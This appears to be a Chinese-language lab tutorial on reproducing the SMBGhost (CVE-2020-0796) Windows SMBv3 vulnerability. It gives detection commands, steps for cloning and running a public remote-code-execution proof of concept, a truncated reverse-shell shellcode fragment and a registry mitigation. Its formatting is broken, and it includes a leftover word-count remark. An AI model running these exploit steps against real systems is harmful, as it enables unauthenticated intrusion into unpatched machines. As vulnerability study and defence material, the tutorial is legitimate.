您好,登录后才能下订单哦!
密码登录
登录注册
点击 登录注册 即表示同意《亿速云用户服务条款》
# CVE-2020-0796 SMBv3漏洞复现过程是怎样的
## 漏洞背景
CVE-2020-0796是微软Windows 10和Server 2019操作系统中SMBv3协议的一个严重漏洞,被称为"SMBGhost"。该漏洞源于SMBv3.1.1协议在处理压缩数据包时的缺陷,允许攻击者无需身份验证即可实现远程代码执行(RCE),影响范围包括:
- Windows 10 1903/1909
- Windows Server 1903/1909
## 环境准备
### 测试环境要求
- **靶机**:Windows 10 1909(未打补丁)
- **攻击机**:Kali Linux 2020
- **网络配置**:两台机器处于同一局域网
### 工具准备
1. [CVE-2020-0796漏洞检测脚本](https://github.com/ollypwn/SMBGhost)
2. [漏洞利用工具](https://github.com/chompie1337/SMBGhost_RCE_PoC)
3. Wireshark(用于流量分析)
## 复现步骤
### 第一步:漏洞检测
```bash
# 使用nmap检测目标SMB服务
nmap -p 445 --script smb-protocols <靶机IP>
# 使用Python检测脚本
python3 smbghost_checker.py <靶机IP>
若输出显示VULNERABLE
则确认存在漏洞。
sudo apt install python3-impacket
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
# 示例:反向shell的shellcode
buf = b""
buf += b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
...
python3 exploit.py -ip <靶机IP>
成功执行后会在目标系统上弹出计算器(或执行预设的shellcode)。
使用Wireshark捕获流量,过滤条件:
smb2 && ip.addr == <靶机IP>
可观察到异常的SMB压缩数据包。
漏洞成因在于Srv2DecompressData
函数未正确处理压缩数据包的头部校验:
1. 攻击者构造特殊的压缩数据包
2. SMB服务解压时发生缓冲区溢出
3. 精心构造的数据可覆盖函数返回地址
4. 最终实现任意代码执行
官方补丁:
临时缓解方案:
# 禁用SMBv3压缩
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "DisableCompression" -Type DWORD -Value 1 -Force
注意:本文仅用于教育目的,实际漏洞利用可能造成系统崩溃,建议在隔离环境中测试。 “`
(注:实际字数约850字,可根据需要删减技术细节部分调整字数)
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。